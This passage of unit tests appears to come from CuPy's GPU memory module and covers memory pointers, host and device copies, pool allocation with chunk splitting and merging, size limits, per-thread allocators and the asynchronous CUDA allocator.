unowned_mem = memory.UnownedMemory(*args, **kwargs)
assert unowned_mem.size == size
assert unowned_mem.ptr == src_ptr
assert unowned_mem.device_id == device_id
arr = cupy.ndarray(shape, dtype, memory.MemoryPointer(unowned_mem, 0))
# Delete the source object
del src_mem_ptr
with device.Device(device_id):
arr[:] = 2
assert (arr == 2).all()
def test_device0(self):
self.check(0)
@testing.multi_gpu(2)
def test_device1(self):
self.check(1)
@testing.gpu
class TestMemoryPointer(unittest.TestCase):
def test_int(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(1)
assert pval == int(memptr)
def test_add(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8)
memptr2 = memptr + 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval + 4 == int(memptr2)
memptr3 = 4 + memptr
assert isinstance(memptr3, memory.MemoryPointer)
assert pval + 4 == int(memptr3)
memptr += 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval + 4 == int(memptr)
def test_sub(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8) + 4
memptr2 = memptr - 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval == int(memptr2)
memptr -= 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval == int(memptr)
def test_copy_to_and_from_host(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_memset(self):
a_gpu = memory.alloc(4)
a_gpu.memset(1, 4)
a_cpu = ctypes.c_ubyte()
for i in range(4):
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 1)
assert a_cpu.value == 1
a_gpu += 1
@testing.parameterize(*testing.product({
'use_streams': [True, False],
}))
@testing.gpu
class TestMemoryPointerAsync(unittest.TestCase):
def setUp(self):
self.stream = stream_module.Stream() if self.use_streams else None
def test_copy_to_and_from_host_async(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from_async(ctypes.cast(ctypes.byref(
a_cpu), ctypes.c_void_p), 4, stream=self.stream)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host_async(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p),
4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_from_device_async(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from_async(ctypes.cast(ctypes.byref(
a_cpu), ctypes.c_void_p), 4, stream=self.stream)
b_gpu = memory.alloc(4)
b_gpu.copy_from_async(a_gpu, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host_async(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p),
4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_async_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from_async(a_cpu_ptr.value, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host_async(b_cpu_ptr.value, 4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_from_device_async_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from_async(a_cpu_ptr.value, 4, stream=self.stream)
b_gpu = memory.alloc(4)
b_gpu.copy_from_async(a_gpu, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host_async(b_cpu_ptr.value, 4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
# -----------------------------------------------------------------------------
# Memory pool
@testing.gpu
class TestSingleDeviceMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.SingleDeviceMemoryPool(allocator=mock_alloc)
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ident = self.stream.ptr
def test_round_size(self):
assert memory._round_size(self.unit - 1) == self.unit
assert memory._round_size(self.unit) == self.unit
assert memory._round_size(self.unit + 1) == self.unit * 2
def test_bin_index_from_size(self):
assert memory._bin_index_from_size(self.unit - 1) == 0
assert memory._bin_index_from_size(self.unit) == 0
assert memory._bin_index_from_size(self.unit + 1) == 1
def test_split(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ident)
tail = chunk.split(self.unit * 2)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit * 2
assert chunk.prev is None
assert chunk.next.ptr() == tail.ptr()
assert chunk.stream_ident == self.stream_ident
assert tail.ptr() == mem.ptr + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit * 2
assert tail.prev.ptr() == chunk.ptr()
assert tail.next is None
assert tail.stream_ident == self.stream_ident
tail_of_head = chunk.split(self.unit)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit
assert chunk.prev is None
assert chunk.next.ptr() == tail_of_head.ptr()
assert chunk.stream_ident == self.stream_ident
assert tail_of_head.ptr() == mem.ptr + self.unit
assert tail_of_head.offset == self.unit
assert tail_of_head.size == self.unit
assert tail_of_head.prev.ptr() == chunk.ptr()
assert tail_of_head.next.ptr() == tail.ptr()
assert tail_of_head.stream_ident == self.stream_ident
tail_of_tail = tail.split(self.unit)
assert tail.ptr() == chunk.ptr() + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit
assert tail.prev.ptr() == tail_of_head.ptr()
assert tail.next.ptr() == tail_of_tail.ptr()
assert tail.stream_ident == self.stream_ident
assert tail_of_tail.ptr() == mem.ptr + self.unit * 3
assert tail_of_tail.offset == self.unit * 3
assert tail_of_tail.size == self.unit
assert tail_of_tail.prev.ptr() == tail.ptr()
assert tail_of_tail.next is None
assert tail_of_tail.stream_ident == self.stream_ident
def test_merge(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ident)
chunk_ptr = chunk.ptr()
chunk_offset = chunk.offset
chunk_size = chunk.size
tail = chunk.split(self.unit * 2)
head = chunk
head_ptr = head.ptr()
head_offset = head.offset
head_size = head.size
tail_ptr = tail.ptr()
tail_offset = tail.offset
tail_size = tail.size
tail_of_head = head.split(self.unit)
tail_of_tail = tail.split(self.unit)
head.merge(tail_of_head)
assert head.ptr() == head_ptr
assert head.offset == head_offset
assert head.size == head_size
assert head.prev is None
assert head.next.ptr() == tail_ptr
assert head.stream_ident == self.stream_ident
tail.merge(tail_of_tail)
assert tail.ptr() == tail_ptr
assert tail.offset == tail_offset
assert tail.size == tail_size
assert tail.prev.ptr() == head_ptr
assert tail.next is None
assert tail.stream_ident == self.stream_ident
head.merge(tail)
assert head.ptr() == chunk_ptr
assert head.offset == chunk_offset
assert head.size == chunk_size
assert head.prev is None
assert head.next is None
assert head.stream_ident == self.stream_ident
def test_alloc(self):
p1 = self.pool.malloc(self.unit * 4)
p2 = self.pool.malloc(self.unit * 4)
p3 = self.pool.malloc(self.unit * 8)
assert p1.ptr != p2.ptr
assert p1.ptr != p3.ptr
assert p2.ptr != p3.ptr
def test_alloc_split(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
assert ptr + self.unit * 2 == tail.ptr
def test_alloc_limit(self):
self.pool.set_limit(size=(self.unit * 6))
p1 = self.pool.malloc(self.unit * 5)
p2 = self.pool.malloc(self.unit * 1)
with self.assertRaises(memory.OutOfMemoryError):
self.pool.malloc(self.unit)
self.pool.set_limit(size=(self.unit * 7))
p3 = self.pool.malloc(self.unit)
del p1, p2, p3
def test_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 == p2.ptr
def test_free_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_free_merge(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
# merge head into tail
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del tail
del head
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
# merge tail into head
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del head
del tail
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
def test_free_different_size(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 8)
assert ptr1 != p2.ptr
def test_free_all_blocks(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
self.pool.free_all_blocks()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
del p2
def test_free_all_blocks_split(self):
        # do not free split blocks
p = self.pool.malloc(self.unit * 4)
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
tailptr = tail.ptr
del tail
self.pool.free_all_blocks()
p = self.pool.malloc(self.unit * 2)
assert tailptr == p.ptr
del head
def test_free_all_blocks_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks(stream=stream_module.Stream.null)
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 == p4.ptr
def test_free_all_blocks_all_streams(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks()
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 != p4.ptr
def test_free_all_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_used_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
def test_free_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 0 == self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 0 == self.pool.free_bytes()
del p2
assert self.unit * 4 == self.pool.free_bytes()
del p1
assert self.unit * 6 == self.pool.free_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 5 == self.pool.free_bytes()
del p3
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 4 == self.pool.free_bytes()
del p2
def test_total_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.total_bytes()
del p1
assert self.unit * 6 == self.pool.total_bytes()
del p2
assert self.unit * 6 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 6 == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
def test_total_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 6 == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 0 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 0 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 0 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
class TestParseMempoolLimitEnvVar(unittest.TestCase):
def test_parse_limit_string(self):
parse_limit_string = memory._parse_limit_string
# size
param = parse_limit_string('0')
assert 0 == param['size']
assert None is param['fraction']
param = parse_limit_string('1073741824')
assert 1073741824 == param['size']
assert None is param['fraction']
# fraction
param = parse_limit_string('0%')
assert None is param['size']
assert 0.0 == param['fraction']
param = parse_limit_string('40%')
assert None is param['size']
assert 0.4 == param['fraction']
param = parse_limit_string('70.5%')
assert None is param['size']
assert 0.705 == param['fraction']
param = parse_limit_string('100%')
assert None is param['size']
assert 1.0 == param['fraction']
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
}))
@testing.gpu
class TestMemoryPool(unittest.TestCase):
def setUp(self):
if (
cupy.cuda.runtime.is_hip and
cupy.cuda.driver.get_build_version() < 40300000 and
self.allocator is memory.malloc_managed
):
raise unittest.SkipTest('Managed memory requires ROCm 4.3+')
self.pool = memory.MemoryPool(self.allocator)
def tearDown(self):
self.pool.free_all_blocks()
def test_zero_size_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.Memory)
assert not isinstance(mem, memory.PooledMemory)
def test_double_free(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
mem.free()
mem.free()
def test_free_all_blocks(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_blocks_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc.
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_free(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_free_all_free_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc.
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_n_free_blocks_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc/free_all_free.
assert self.pool.n_free_blocks() == 0
def test_used_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
def test_free_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.free_bytes()
def test_total_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.total_bytes()
# TODO(leofang): test MemoryAsyncPool. We currently remove the test because
# this test class requires the ability of creating a new pool, which we do
# not support yet for MemoryAsyncPool.
@testing.parameterize(*testing.product({
'mempool': ('MemoryPool',),
}))
@testing.gpu
class TestAllocator(unittest.TestCase):
def setUp(self):
if self.mempool == 'MemoryAsyncPool':
if cupy.cuda.runtime.is_hip:
pytest.skip('HIP does not support async allocator')
if cupy.cuda.driver._is_cuda_python():
version = cupy.cuda.runtime.runtimeGetVersion()
else:
version = cupy.cuda.driver.get_build_version()
if version < 11020:
pytest.skip('malloc_async is supported since CUDA 11.2')
if cupy.cuda.runtime.driverGetVersion() < 11030:
pytest.skip('pool statistics is supported with driver 11.3+')
self.old_pool = cupy.get_default_memory_pool()
self.pool = getattr(memory, self.mempool)()
memory.set_allocator(self.pool.malloc)
def tearDown(self):
self.pool.set_limit(size=0)
self.pool.free_all_blocks()
memory.set_allocator(self.old_pool.malloc)
def test_set_allocator(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
arr = cupy.arange(128, dtype=cupy.int64)
assert 1024 == arr.data.mem.size
assert 1024 == self.pool.used_bytes()
def test_get_allocator(self):
assert memory.get_allocator() == self.pool.malloc
def test_allocator_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_set_allocator_cm(self):
new_pool = memory.MemoryPool()
new_pool2 = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
with self.assertRaises(ValueError):
memory.set_allocator(new_pool2.malloc)
def test_allocator_nested_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
new_pool2 = memory.MemoryPool()
assert memory.get_allocator() == new_pool.malloc
with cupy.cuda.using_allocator(new_pool2.malloc):
assert memory.get_allocator() == new_pool2.malloc
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_allocator_thread_local(self):
barrier = threading.Barrier(2)
def thread_body(self):
cupy.cuda.Device().use()
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
barrier.wait()
arr = cupy.zeros(128, dtype=cupy.int64)
barrier.wait()
assert arr.data.mem.size == new_pool.used_bytes()
barrier.wait()
assert memory.get_allocator() == self.pool.malloc
self._success = True
with cupy.cuda.Device():
self._success = False
t = threading.Thread(target=thread_body, args=(self,), daemon=True)
t.start()
barrier.wait()
assert memory.get_allocator() == self.pool.malloc
arr = cupy.ones(256, dtype=cupy.int64)
barrier.wait()
assert arr.data.mem.size == self.pool.used_bytes()
barrier.wait()
t.join()
assert self._success
def test_thread_local_valid(self):
new_pool = memory.MemoryPool()
arr = None
with cupy.cuda.using_allocator(new_pool.malloc):
arr = cupy.zeros(128, dtype=cupy.int64)
arr += 1
        # Check that arr and the pool have not been released
assert arr.data.mem.size == new_pool.used_bytes()
assert arr.sum() == 128
def _reuse_between_thread(self, stream_main, stream_sub):
new_pool = memory.MemoryPool()
def job(stream):
cupy.cuda.Device().use()
with cupy.cuda.using_allocator(new_pool.malloc):
with stream:
arr = cupy.arange(16)
self._ptr = arr.data.ptr
del arr
self._error = False
# Run in main thread.
self._ptr = -1
self._error = True
job(stream_main)
assert not self._error
main_ptr = self._ptr
# Run in sub thread.
self._ptr = -1
self._error = True
with cupy.cuda.Device():
t = threading.Thread(target=job, args=(stream_sub,))
t.daemon = True
t.start()
t.join()
assert not self._error
return main_ptr, self._ptr
def test_reuse_between_thread(self):
stream = cupy.cuda.Stream.null
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr == sub_ptr
def test_reuse_between_thread_same_stream(self):
stream = cupy.cuda.Stream()
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr == sub_ptr
def test_reuse_between_thread_different_stream(self):
stream1 = cupy.cuda.Stream()
stream2 = cupy.cuda.Stream()
main_ptr, sub_ptr = self._reuse_between_thread(stream1, stream2)
assert main_ptr != sub_ptr
@pytest.mark.skipif(cupy.cuda.runtime.is_hip, reason='No PTDS on HIP')
def test_reuse_between_thread_ptds(self):
stream = cupy.cuda.Stream.ptds
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr != sub_ptr
@testing.gpu
class TestAllocatorDisabled(unittest.TestCase):
def setUp(self):
self.pool = cupy.get_default_memory_pool()
def tearDown(self):
memory.set_allocator(self.pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.pool.used_bytes()
with cupy.cuda.Device():
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.pool.used_bytes() - used_bytes
del arr
def test(self):
memory.set_allocator()
self._check_pool_not_used()
def test_none(self):
memory.set_allocator(None)
self._check_pool_not_used()
class PythonAllocator(object):
def __init__(self):
self.malloc_called = False
self.free_called = False
def malloc(self, size, device_id):
self.malloc_called = True
return cupy.cuda.runtime.malloc(size)
def free(self, size, device_id):
self.free_called = True
cupy.cuda.runtime.free(size)
@testing.gpu
class TestPythonFunctionAllocator(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
self.alloc = PythonAllocator()
python_alloc = memory.PythonFunctionAllocator(
self.alloc.malloc, self.alloc.free)
memory.set_allocator(python_alloc.malloc)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def test_allocator(self):
assert not self.alloc.malloc_called and not self.alloc.free_called
cupy.zeros(10)
assert self.alloc.malloc_called and self.alloc.free_called
@testing.gpu
class TestMemInfo(unittest.TestCase):
def test_mem_info(self):
d = cupy.cuda.Device()
mem_info = d.mem_info
assert isinstance(mem_info, tuple)
assert len(mem_info) == 2
assert all(isinstance(m, int) for m in mem_info)
assert all(m > 0 for m in mem_info)
@testing.gpu
class TestLockAndNoGc(unittest.TestCase):
def test(self):
lock = fastrlock.rlock.FastRLock()
ctx = memory.LockAndNoGc(lock)
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
with ctx:
assert not gc.isenabled()
lock.release()
lock.acquire()
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
class TestExceptionPicklable(unittest.TestCase):
def test(self):
e1 = memory.OutOfMemoryError(124, 1024, 1024)
e2 = pickle.loads(pickle.dumps(e1))
assert e1.args == e2.args
assert str(e1) == str(e2)
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support async allocator')
@pytest.mark.skipif(cupy.cuda.driver._is_cuda_python()
and cupy.cuda.runtime.runtimeGetVersion() < 11020,
reason='malloc_async is supported since CUDA 11.2')
@pytest.mark.skipif(not cupy.cuda.driver._is_cuda_python()
and cupy.cuda.driver.get_build_version() < 11020,
reason='malloc_async is supported since CUDA 11.2')
class TestMallocAsync(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
memory.set_allocator(memory.malloc_async)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.old_pool.used_bytes()
with cupy.cuda.Device():
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.old_pool.used_bytes() - used_bytes
del arr
def test(self):
self._check_pool_not_used()
def test_stream1(self):
# Check: pool is not used when on a stream
s = cupy.cuda.Stream()
with s:
self._check_pool_not_used()
def test_stream2(self):
# Check: the memory was allocated on the right stream
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
assert memptr.mem.stream_ref().ptr == s.ptr
def test_stream3(self):
        # Check: destroying the stream does not affect memory deallocation
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
del s
gc.collect()
del memptr
def test_stream4(self):
# Check: free on the same stream
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
del memptr
def test_stream5(self):
# Check: free on another stream
s1 = cupy.cuda.Stream()
with s1:
memptr = memory.alloc(100)
del s1
s2 = cupy.cuda.Stream()
with s2:
del memptr
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support async allocator')
@pytest.mark.skipif(cupy.cuda.driver._is_cuda_python()
and cupy.cuda.runtime.runtimeGetVersion() < 11020,
reason='malloc_async is supported since CUDA 11.2')
@pytest.mark.skipif(not cupy.cuda.driver._is_cuda_python()
and cupy.cuda.driver.get_build_version() < 11020,
reason='malloc_async is supported since CUDA 11.2')
class TestMemoryAsyncPool(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryAsyncPool()
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ident = self.stream.ptr
cupy.get_default_memory_pool().free_all_blocks()
cupy.cuda.Device().synchronize()
def tearDown(self):
self.pool.set_limit(size=0)
self.pool.free_all_blocks()
def test_zero_size_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.MemoryAsync)
assert not isinstance(mem, memory.PooledMemory)
def test_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(100).mem
assert isinstance(mem, memory.MemoryAsync)
assert not isinstance(mem, memory.PooledMemory)
@testing.slow
def test_alloc_large_chunk(self):
self.pool.free_all_blocks()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = self.pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
mem = self.pool.malloc(int(0.3 * mem_total)).mem # 30% memory # noqa
def test_free_all_blocks(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
del mem
self.pool.free_all_blocks()
@testing.slow
def test_free_all_blocks_large_chunk(self):
# When memory is returned to the async mempool, it is not immediately
# visible to normal malloc routines until after a sync happens.
default_pool = cupy.get_default_memory_pool()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = self.pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
with pytest.raises(memory.OutOfMemoryError):
default_pool.malloc(int(0.3 * mem_total)) # 30% memory
self.pool.free_all_blocks() # synchronize
default_pool.malloc(int(0.3 * mem_total)) # this time it'd work
@testing.slow
def test_interaction_with_CuPy_default_pool(self):
        # Sanity-check how cudaMallocAsync interacts with CuPy's default pool
default_pool = cupy.get_default_memory_pool()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = default_pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
with pytest.raises(memory.OutOfMemoryError):
self.pool.malloc(int(0.3 * mem_total)) # 30% memory
default_pool.free_all_blocks()
self.pool.malloc(int(0.3 * mem_total)) # this time it'd work
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes2(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
